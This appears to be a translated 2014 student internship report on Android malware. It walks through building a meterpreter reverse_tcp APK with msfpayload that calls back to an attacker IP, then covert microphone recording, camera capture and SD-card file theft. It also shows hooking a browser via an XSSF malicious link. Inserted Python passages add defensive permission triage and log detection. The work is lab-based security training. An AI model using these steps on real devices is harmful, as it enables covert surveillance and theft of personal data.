ATHENA INTERNSHIP REPORT - MID-TERM REPORT


INTERNSHIP REPORT, August 16, 2014

INTERNSHIP TOPIC REPORT: STUDY OF TROJANS AND MALWARE THAT STEAL AND ORGANISE DATA SUCH AS CONTACTS AND TEXT MESSAGES ON ANDROID PHONES AND SEND IT OUT.
Supervising lecturer: Võ Đỗ Thắng
Student: Phan Lê Trúc Anh
MID-TERM REPORT (17/08/2014)

Contents:
1. Topic: study of trojans and malware that steal and organise data such as contact lists and text messages on Android phones and send it out.
2. Requirements:
Part 1: on a LAN (with Wi-Fi)
1.1 Study the Kali Linux operating system. Install Kali Linux (or BackTrack).
1.2 Study how malicious code is created on Kali Linux in particular and for Android in general.
1.3 Study how malicious code is integrated into software and spread through social networks.
1.4 Extract data from the smartphone's SD card and camera.
Part 2: on a Virtual Private Server (VPS, a server with internet access)
2.1 Install autosploit on the VPS.
2.2 Create malicious code on the VPS.
2.3 Gain access to android1, android2 and android3 and send data from the Android devices back to the VPS.

TABLE OF CONTENTS
I. KALI LINUX AND HOW TO INSTALL A KALI LINUX VIRTUAL MACHINE ON VMWARE WORKSTATION

Kali Linux is an operating system built on the Linux kernel and designed for security testing and penetration testing of computer systems. Kali Linux is developed on the Debian platform; it has improved compatibility with the ARM architecture, better wireless networking support, a high degree of customisability, and easy upgrades between future Kali releases.

Steps to create a virtual machine running Kali Linux in VMware Workstation.

1. Preparation:
- A computer with VMware Workstation installed. Here we use VMware Workstation 10.0.0.
- Download the 64-bit Kali Linux 1.0.7 ISO from www.kali.org/downloads.

2. Procedure:
Step 1: Start VMware. Go to File > New Virtual Machine (or Ctrl+N).
Step 2: Choose Type: Custom (advanced) > Next.
Step 3: When asked for the installation media, choose I will install the operating system later > Next.
Step 4: Choose Linux as the guest operating system and Debian 7 64-bit as the version > Next.
Step 5: Choose where to store the virtual machine and name it Debian 7 64 > Next.
Step 6: Leave the processor configuration at the default > Next.
Step 7: Set the RAM to 512MB > Next. (Note: this must be suitable for the host machine.)
Step 8: Choose Bridged networking as the network type > Next.
Step 9: Allocate disk space for the virtual machine. We allocate a maximum of 15GB and choose Store virtual disk as a single file > Next.
Step 10: Point the ISO file at the newly created virtual machine. Right-click the virtual machine name Debian 7 64 > Settings. Select CD/DVD (IDE) > under Connection choose Use ISO image file > browse to the 64-bit Kali Linux ISO file.
Step 11: Start the virtual machine. In the Boot menu, choose Graphical install.
Step 12: Choose Language, Location and Keyboard > Continue.
Step 13: Next configure the network: set the Hostname > set the Domain name > Continue.
Step 14: Create the user name and password > Continue. This step is important: the root password is the password you will use to log in to the Debian 7 64 virtual machine.
Step 15: Configure the clock > Next.
Step 16: Partition the disk: we keep the default Guided use entire disk > Continue. When asked Write the changes to disk?, choose Yes > Continue, then wait for Install System.
Step 17: Configure the package manager. When asked Use the network mirror?, choose No > Continue.
Step 18: Install the GRUB boot loader. When asked Install the GRUB boot loader to the master boot record?, choose Yes > Continue.
Step 19: Wait for the installation to finish > Finish the Installation > Continue.
Step 20: Once complete, the Debian 7 64 virtual machine restarts on its own. Log in with the user root and the password you set.
II. STUDY OF MALWARE, TROJANS AND HOW MALICIOUS CODE IS CREATED ON ANDROID

1. Malware and Trojan concepts:
- Malware (malicious software) is any harmful computer software created with the intent of breaking into and damaging a computer, collecting information, or accessing sensitive data without the user's knowledge. Malware includes viruses, worms, trojan horses, adware, spyware, keyloggers, backdoors and rootkits.
- A Trojan (Trojan horse) is also called spyware. It is a harmful program that does not try to replicate itself; instead it is installed on the user's system by pretending to be a legitimate program.
- Today malware mostly just breaks into the computer and steals user information; it has no spreading mechanism of its own. Malware behaves like a trojan rather than like a destructive virus.
- Simply put, malware and trojans give the attacker access to the user's machine, remote control of it, and the ability to collect the user's information.

2. How malware operates:
Take as a concrete example a malware family that was very widespread recently, DroidDream. This malware works in two stages:
- Stage 1: DroidDream is embedded in an application (more than 50 applications are known to contain it) and gains root access to the device as soon as the application is run for the first time.
- Stage 2: it automatically installs a second application with a special permission that grants the right to uninstall. Once this second application is installed, it can send sensitive information to a remote server and silently download further applications.
Once DroidDream has root, it waits and silently installs a second application, DownloadProviderManager.apk, as a system application. Installing it as a system application prevents the user from seeing or uninstalling applications without permission. Unlike the first stage, where the user has to launch the application to start the infection, in the second stage the application performs actions such as confirm and checkin on its own. One more thing that keeps you from knowing when it is active: DroidDream is programmed to do most of its work between 11 pm and 8 am the next morning, the period when the phone is least likely to be in use. This makes it harder for the user to notice unusual behaviour on their smartphone.
There is now also malware able to eavesdrop on every phone call. This is genuinely dangerous, since all of our private matters are being monitored, so the threats from malicious code on Android are a real danger to the safety of users of this operating system.

3. How trojans operate:
- There are many kinds of trojan, but two are common: trojans used for remote control and trojans used to steal passwords.
- The first step is the same for both kinds. The computer is infected with the trojan through an e-mail attachment, a game, or some program you happen to try out. It copies itself somewhere on the computer. It then writes entries into the machine's registry so that it starts automatically when the computer boots.
- After that, a remote-control trojan lets the attacker take control of the computer remotely. A password-stealing trojan saves the user's passwords to a file and automatically e-mails it to the attacker when the computer connects to the network.
III. ANDROID VIRTUAL DEVICE: CREATING A VIRTUAL MACHINE WITH ECLIPSE

Eclipse includes the Android Virtual Device feature, which lets us create virtual machines running Android (a smartphone or a tablet). With these virtual machines we can study how malicious code is integrated into an Android device.

1. Tools needed:
- Eclipse
- Java SE Development Kit
- Android Developer Tools
- Android SDK
- Android Debug Bridge (ADB) tools
- Basic Android applications

2. Download and install the JDK (Java SE Development Kit):
Step 1: Download the JDK from http://www.oracle.com/technetwork/java/javase/downloads/jdk7-downloads-1880260.html. Click Accept License Agreement and choose the version that matches your computer; here we choose Windows x64.
Step 2: After downloading, install it as with most other software by clicking through Next, then click Close.
Step 3: To verify the JDK installation, open cmd.exe and type the command java.

3. Download Eclipse Android Developer Tools and the Android SDK:
Note that this bundle includes Eclipse.
Step 1: Download from http://developer.android.com/sdk/index.html. Click I have read and agree, choose the 64-bit version, and click Download.
Step 2: Extract the downloaded file and run SDK Manager.exe. You may see the error Fetching https://dl-ssl... Failed to fetch. Close that message. The Choose Packages to Install window appears; if it is empty, click Cancel, go back to the Android SDK and AVD Manager window > Settings > tick Force https://... If the error does not occur, the Android SDK Manager window appears; select the packages you want and click Install.
Step 3: In the Choose Packages to Install window, tick Accept License > Install > wait for it to finish.

4. Integrate the Android SDK into Eclipse:
Once we have Eclipse and the Android SDK, they need to be linked before use.
Step 1: Open eclipse.exe in the folder where the Eclipse Android Developer Tools and Android SDK bundle was extracted: D:\Soft\adt-bundle-windows-x86_64-20140702\eclipse\eclipse.exe
Step 2: Go to Help > Install new software > Add > Name: type a name for the tool > Location: enter the ADT download address https://dl.google.com/android/eclipse or https://dl-ssl.google.com/android/eclipse > OK.
Step 3: In the Name list, tick Developer Tools.
Step 4: Click Next > Next > Accept > Next > Finish, then Run in Background.
Step 5: Go to Windows > Preferences > Android > Browse > point to the downloaded Android SDK folder > Apply > OK.
Step 6: Restart Eclipse.

5. Create a virtual machine running Android in Eclipse:
An Android Virtual Device is a virtual machine on which developers develop applications. The steps to create an AVD in Eclipse are:
Step 1: Open eclipse.exe > go to Windows > Android Virtual Device Manager.
Step 2: Set the required parameters:
Name: a name for the device.
Device: the type of device you want to create.
Target: the operating system version.
Skin: the screen size you want; it normally has to match the Device chosen above.
SDcard: the virtual memory card for the AVD.
Step 3: Click OK to create the virtual machine. Start it with Start > Launch.
Step 4: Wait for it to finish; we now have a virtual machine running Android.
IV. ANDROID VIRTUAL MACHINE WITH GENYMOTION ON TOP OF VIRTUALBOX

Genymotion together with VirtualBox lets us create virtual machines running Android (a smartphone or a tablet). With these virtual machines we can study how malicious code is integrated into an Android device.

1. Tools needed:
- VirtualBox.
- Genymotion.
- Java SE Development Kit.
- Android SDK Manager.

2. Download and install the JDK (Java SE Development Kit) and the Android SDK Manager:
Downloading and installing these is covered in section III of this report.

3. Download and install the VirtualBox virtualisation software:
Choose the VirtualBox build that matches your machine.
Step 1: Download the VirtualBox installer from http://www.oracle.com/technetwork/server-storage/virtualbox/downloads/index.html
Step 2: After downloading, install it as with most other software:
Step 3: Next > Next > Next > Install > Finish.
Step 4: The program's interface after installation.

4. Download and install Genymotion:
Step 1: Before starting, you need an account on www.genymotion.com. You can register for free and download Genymotion.
Step 2: Start the Genymotion installer. Choose the installation language > OK > Next.
Step 3: Choose the installation folder.
Step 4: Next > Next > Install > Finish.
Step 5: Open the newly installed Genymotion and set a few parameters under Settings.
Step 6: On the General tab, enter the username and password you registered on www.genymotion.com.
Step 7: On the ADB tab, choose Use custom Android SDK tools and browse to the sdk folder inside the folder where the Android SDK Manager was downloaded, then save the settings: F:\Soft\adt-bundle-windows-x86_64-20140702\sdk

5. Create a virtual machine running Android with Genymotion and VirtualBox:
Step 1: Open Genymotion to create the virtual machine. Click Add.
Step 2: Choose the name of the device you want to emulate. The configuration of the virtual machine about to be created is shown:
Step 3: Next > wait for the virtual machine image to download from the web, then Finish.
Step 4: To start the newly created virtual machine, select it > Play.
Step 5: The interface of the newly created Google Nexus 7 virtual machine.
V. CREATING MALICIOUS CODE ON KALI LINUX AND ATTACKING AN ANDROID DEVICE:

1. Tools needed:
To create the malicious code and attack the Android device we need:
- A machine running the Kali (or BackTrack) Linux distribution. Here VMware is used to create the Kali virtual machine (see the earlier instructions).
- A virtual Android device. Here Genymotion with VirtualBox is used to create a tablet running Android 4.3.
- Both machines able to connect to the network.
- An e-mail account on both machines to send and receive the file.

2. Procedure:
Step 1: Start the attacking Kali Linux machine and the victim Android device. Configure the network adapter of the attacking Kali machine so that it can reach the internet: go to Edit > Virtual Network Editor, select VMnet0 > set Type to Bridged > under Bridged to, choose the host's physical network adapter.
Step 3: Check the IP address of the attacking Kali machine with the command: ifconfig
Step 4: Create a file containing the malicious code and send it to the Android device. Here we create an *.apk application file and send it by e-mail.
Enter the command:
msfpayload android/meterpreter/reverse_tcp lhost=<attacker IP> lport=<port> R > /<output path>
For example:
msfpayload android/meterpreter/reverse_tcp lhost=192.168.149.136 lport=8080 R > /root/Desktop/appsX.apk
- This creates the malicious ReverseTCP application in the file appsX.apk.
- The attacking machine's IP address is 192.168.149.136.
- The port is 8080 (note: avoid the well-known ports 0 to 1023).
- The file is saved on the Desktop.
Step 5: Start Metasploit on the attacking Kali machine with the command: msfconsole
Step 6: Then set the payload, lhost and lport with the commands:
set payload android/meterpreter/reverse_tcp
set lhost 192.168.149.136
set lport 8080
Step 7: Run the exploit command to start the attack.
Step 8: On the Android device, after downloading and installing appsX.apk, an application named MainActivity appears. Start it and tap ReverseTCP.
On Kali we then receive a notification that a device has connected as a victim.
Step 9: Use the help command to list the commands available.

3. Gathering system information:
View system information with the sysinfo command.
4. Covert audio recording:
Record audio on the victim Android device and save it to the attacking Kali machine with the record_mic command. The recorded file, xLijsRbg.wav, is saved automatically under /root on the Kali machine.
5. Using the camera to take pictures covertly:
List the cameras of the victim Android device and take a picture, saved to the attacking Kali machine, with the webcam_list and webcam_snap commands. The captured image, FRumITki.jpeg, is saved automatically under /root on the Kali machine.
6. Examining the victim's system:
Check what is running on the system with the ps command.
7. Extracting data from the SD card:
Change into the SD card storage with cd /sdcard. Use ls to list the folders and files on the SD card. View the files the victim has downloaded by changing into the Download folder with cd Download and listing it with ls. Any file can be stolen and downloaded with the download command; here download appsX.apk is used. The stolen appsX.apk is saved automatically under /root on the attacking Kali machine.
8. Ending the attack:
Use the exit command to leave Metasploit and end the attack.
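A defender-side counterpart to sections II and V: everything the appsX.apk session does on the device (record_mic, webcam_snap, reading the SD card, and the contact and SMS theft the topic describes) has to be granted through the app's own permission set, so a decoded manifest already shows the capability combination before the app is ever run. The Python below is an added example and not code from the report; it assumes the APK has been decoded to plain XML (for instance with apktool), and the manifest embedded in it is constructed for this example, not taken from the report's APK.

```python
"""Static permission triage of a decoded AndroidManifest.xml.

Added example (not the report's own code). Assumes the APK has already been
decoded to plain XML, e.g. with `apktool d appsX.apk`; the manifest below is
constructed for this example and is not taken from the report's APK.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME_ATTR = "{%s}name" % ANDROID_NS

# What each permission lets an app do, grouped the way a reviewer thinks:
# network = can send data out, surveillance = mic/camera, data = user data,
# persistence = comes back without the user launching the app again.
PERMISSION_CAPABILITY = {
    "android.permission.INTERNET": "network",
    "android.permission.RECORD_AUDIO": "surveillance",
    "android.permission.CAMERA": "surveillance",
    "android.permission.READ_CONTACTS": "data",
    "android.permission.READ_SMS": "data",
    "android.permission.RECEIVE_SMS": "data",
    "android.permission.READ_CALL_LOG": "data",
    "android.permission.READ_EXTERNAL_STORAGE": "data",
    "android.permission.WRITE_EXTERNAL_STORAGE": "data",
    "android.permission.ACCESS_FINE_LOCATION": "data",
    "android.permission.RECEIVE_BOOT_COMPLETED": "persistence",
}

# Constructed sample: the permission set an app would need for the
# behaviours the report describes (mic, camera, SD card, contacts, SMS).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.constructed">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <application android:label="MainActivity">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <receiver android:name=".BootReceiver">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""


def declared_permissions(manifest_xml):
    """Set of permission names declared with <uses-permission>."""
    root = ET.fromstring(manifest_xml)
    return {el.get(NAME_ATTR) for el in root.iter("uses-permission") if el.get(NAME_ATTR)}


def boot_receivers(manifest_xml):
    """Names of receivers registered for BOOT_COMPLETED (a restart hook)."""
    root = ET.fromstring(manifest_xml)
    found = []
    for receiver in root.iter("receiver"):
        actions = {a.get(NAME_ATTR) for a in receiver.iter("action")}
        if "android.intent.action.BOOT_COMPLETED" in actions:
            found.append(receiver.get(NAME_ATTR))
    return found


def triage(manifest_xml):
    """Group permissions by capability and flag the combinations that
    together amount to the spyware behaviour the report demonstrates."""
    capabilities = {}
    for perm in sorted(declared_permissions(manifest_xml)):
        cap = PERMISSION_CAPABILITY.get(perm)
        if cap:
            capabilities.setdefault(cap, []).append(perm)

    findings = []
    # Mic or camera alone is normal for a messaging app; combined with
    # network access it is the shape of record_mic / webcam_snap.
    if "network" in capabilities and "surveillance" in capabilities:
        findings.append("can capture audio or images and send them out")
    if "network" in capabilities and "data" in capabilities:
        findings.append("can read stored user data and send it out")
    if "persistence" in capabilities or boot_receivers(manifest_xml):
        findings.append("re-launches itself at boot")
    return {"capabilities": capabilities, "findings": findings}


if __name__ == "__main__":
    report = triage(SAMPLE_MANIFEST)
    for cap, perms in report["capabilities"].items():
        print("%-12s %s" % (cap, ", ".join(p.split(".")[-1] for p in perms)))
    for finding in report["findings"]:
        print("FLAG:", finding)
```

The point of grouping rather than listing is that no single permission is suspicious on its own; it is INTERNET next to RECORD_AUDIO, CAMERA and READ_SMS in an app whose launcher label is just "MainActivity" that should stop an install. On a real decoded APK, replace SAMPLE_MANIFEST with the contents of the decoded AndroidManifest.xml.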
VI. ATTACKING AN ANDROID DEVICE THROUGH A LINK CONTAINING MALICIOUS CODE:

1. Tools needed:
To attack an Android device through a malicious link we need the same preparation as for the malicious-file attack above:
- A machine running the Kali (or BackTrack) Linux distribution. Here VMware is used to create the Kali virtual machine (see the earlier instructions).
- A virtual Android device. Here Genymotion with VirtualBox is used to create a tablet running Android 4.3.
- Both machines able to connect to the network.
- An e-mail account on both machines to send and receive the link.

2. Procedure:
Step 1: Start the attacking Kali Linux machine and the victim Android device.
Step 2: On the Kali machine, open a Terminal and run the following three commands to update the framework:
msfupdate
cd /opt/metasploit/apps/pro/msf3
svn export http://xssf.googlecode.com/svn/trunk/ ./ --force
Step 3: Start Metasploit with the command msfconsole
Step 4: Load XSSF with the command:
load xssf Port=80 Uri=/xssf/ Public=true Mode=Verbose
Step 5: Run the command xssf_urls. This returns the URLs (http web addresses) of the XSSF Server, the XSSF test page and the XSSF logs page.
Step 6: Have the victim machine open the XSSF test page: http://192.168.149.136:80/xssf/test.html
A notification is received on the attacking Kali machine:

3. Checking how many victims are connected to the malicious link:
Use the xssf_victims command to check the number of victims that have opened the malicious link http://192.168.149.136:80/xssf/test.html

4. Viewing information about a connected victim:
Use the xssf_information command; here, for example, xssf_information 1

5. Extracting data from the victim machine:
First use search auxiliary/xssf to check which actions we can perform on the victim machine.
Send an XSSF alert to the victim machine with the commands:
use auxiliary/xssf/public/misc/alert
run
The victim machine then shows the XSSF alert. Return to the msf prompt with Ctrl+C > back.
Check whether the victim has visited common websites with the commands:
use auxiliary/xssf/public/misc/visited_pages
run
Set up a new link and use it to check the victim machine's information once more:
use auxiliary/gather/android_htmlfileprovider
set SRVPORT 87
set URIPATH /
run
Wait for the victim to open the new link http://192.168.149.136:87/
We then receive the victim machine's information:

6. Leaving XSSF in Metasploit:
To exit, run: Ctrl + C > back > exit > exit
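Seen from the network side, both attacks in sections V and VI leave a distinctive trace: the meterpreter session is a single long-lived outbound TCP connection from the device to the handler's port (8080 here), and the XSSF-hooked browser keeps requesting pages under the configured URI (/xssf/), followed by a visit to the second server on port 87. The Python below is an added example, not part of the report; the log format, field names and every record are constructed for this example, with the IP addresses and ports borrowed from the report's own lab setup.

```python
"""Detection pass over constructed connection logs for the two command-and-
control patterns the report demonstrates. Added example, not the report's
code; the CSV format and all records below are constructed.
"""
import csv
import io
from collections import Counter
from datetime import datetime

ALLOWED_PORTS = {80, 443, 53}      # ports ordinary phone traffic uses here
LONG_SESSION_SECONDS = 600         # a session this long on an odd port is rare
HOOK_PATH_PREFIX = "/xssf/"        # the URI XSSF was loaded with in the report
POLL_THRESHOLD = 3                 # repeated hook requests = a hooked browser

# Constructed flow log: ts,src,dst,dport,duration_s,bytes_out,uri (uri empty
# for non-HTTP traffic). .201 holds a reverse_tcp session to the handler;
# .202 opened the XSSF test page and then the port-87 page; .203 is benign.
SAMPLE_LOG = """ts,src,dst,dport,duration_s,bytes_out,uri
2014-08-16T21:03:11,192.168.149.201,192.168.149.136,8080,1842,2317440,
2014-08-16T21:05:02,192.168.149.201,173.194.40.78,443,3,1210,/
2014-08-16T21:10:40,192.168.149.202,192.168.149.136,80,1,512,/xssf/test.html
2014-08-16T21:10:42,192.168.149.202,192.168.149.136,80,1,300,/xssf/
2014-08-16T21:10:44,192.168.149.202,192.168.149.136,80,1,300,/xssf/
2014-08-16T21:10:46,192.168.149.202,192.168.149.136,80,1,300,/xssf/
2014-08-16T21:12:05,192.168.149.202,192.168.149.136,87,1,640,/
2014-08-16T21:15:00,192.168.149.203,192.168.149.1,53,0,80,
"""


def parse_flows(text):
    """Parse the CSV log into dicts with typed fields, ordered by time."""
    flows = []
    for row in csv.DictReader(io.StringIO(text)):
        flows.append({
            "ts": datetime.fromisoformat(row["ts"]),
            "src": row["src"],
            "dst": row["dst"],
            "dport": int(row["dport"]),
            "duration_s": int(row["duration_s"]),
            "bytes_out": int(row["bytes_out"]),
            "uri": row["uri"],
        })
    return sorted(flows, key=lambda f: f["ts"])


def long_sessions_on_unusual_ports(flows):
    """Long-lived connections to ports outside ALLOWED_PORTS: the shape of a
    reverse_tcp session that the Metasploit handler keeps open."""
    return [f for f in flows
            if f["dport"] not in ALLOWED_PORTS
            and f["duration_s"] >= LONG_SESSION_SECONDS]


def hook_requests(flows):
    """HTTP requests under the XSSF URI prefix."""
    return [f for f in flows if f["uri"].startswith(HOOK_PATH_PREFIX)]


def polling_clients(flows):
    """(src, dst) pairs that hit the hook path repeatedly: a browser left
    sitting on the test page and polling the XSSF server for commands."""
    counts = Counter((f["src"], f["dst"]) for f in hook_requests(flows))
    return {pair: n for pair, n in counts.items() if n >= POLL_THRESHOLD}


def http_on_unusual_port(flows):
    """HTTP served from a port other than 80/443, like the port-87 page."""
    return [f for f in flows if f["uri"] and f["dport"] not in (80, 443)]


def alerts(flows):
    """One tuple per finding: (rule, src, dst, detail)."""
    out = []
    for f in long_sessions_on_unusual_ports(flows):
        out.append(("long_session_unusual_port", f["src"], f["dst"], f["dport"]))
    for (src, dst), n in sorted(polling_clients(flows).items()):
        out.append(("xssf_hook_polling", src, dst, n))
    for f in http_on_unusual_port(flows):
        out.append(("http_unusual_port", f["src"], f["dst"], f["dport"]))
    return out


if __name__ == "__main__":
    for rule, src, dst, detail in alerts(parse_flows(SAMPLE_LOG)):
        print("%-26s %s -> %s (%s)" % (rule, src, dst, detail))
```

The long-session rule deliberately ignores bytes_out: a meterpreter session that is only answering sysinfo may move very little data, so duration on an unexpected port is the more reliable signal. The polling rule keys on the URI prefix because XSSF's path is whatever the attacker set when loading the plugin (here /xssf/), so in practice the prefix list has to come from observed traffic, not from a fixed default.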
VII. WEEKLY REPORTS AND VIDEOS OF THE PROCESS

1. Weekly report links:
http://www.slideshare.net/phanconghien/tuan1
http://www.slideshare.net/phanconghien/tuan2
http://www.slideshare.net/phanconghien/tuan3-4

2. Videos of the process:
- Installing Kali Linux on VMware: http://youtu.be/90e-w3SGJnY
- Creating an Android Virtual Device in Eclipse: http://youtu.be/7p9_0ojdmqs
- Creating an Android virtual machine with Genymotion and VirtualBox: http://youtu.be/DkxtthrNb9o
- Creating malicious code on Kali Linux and attacking the Android virtual machine: http://youtu.be/iEawr1JupZ8
- Creating a malicious web page with XSSF: http://youtu.be/1Jw8F_H0Jz4
- Self-introduction clip: http://youtu.be/iRfXCEXI9lo
VIII. REFERENCES
http://sinhvienit.net/forum
www.kali.org/downloads
http://forum.bkav.com.vn
http://vi.wikipedia.org/wiki
http://developer.android.com/sdk/index.html#download
http://www.oracle.com/technetwork/java/javase/downloads
http://choimobile.vn/forums/#thao-luan-hdh-android.62
http://www.oracle.com/technetwork/server-storage/virtualbox/downloads/index.html
http://www.genymotion.com/
http://www.whitehat.vn/threads/
System Hacking course material, ATHENA training centre, www.Athena.Edu.Vn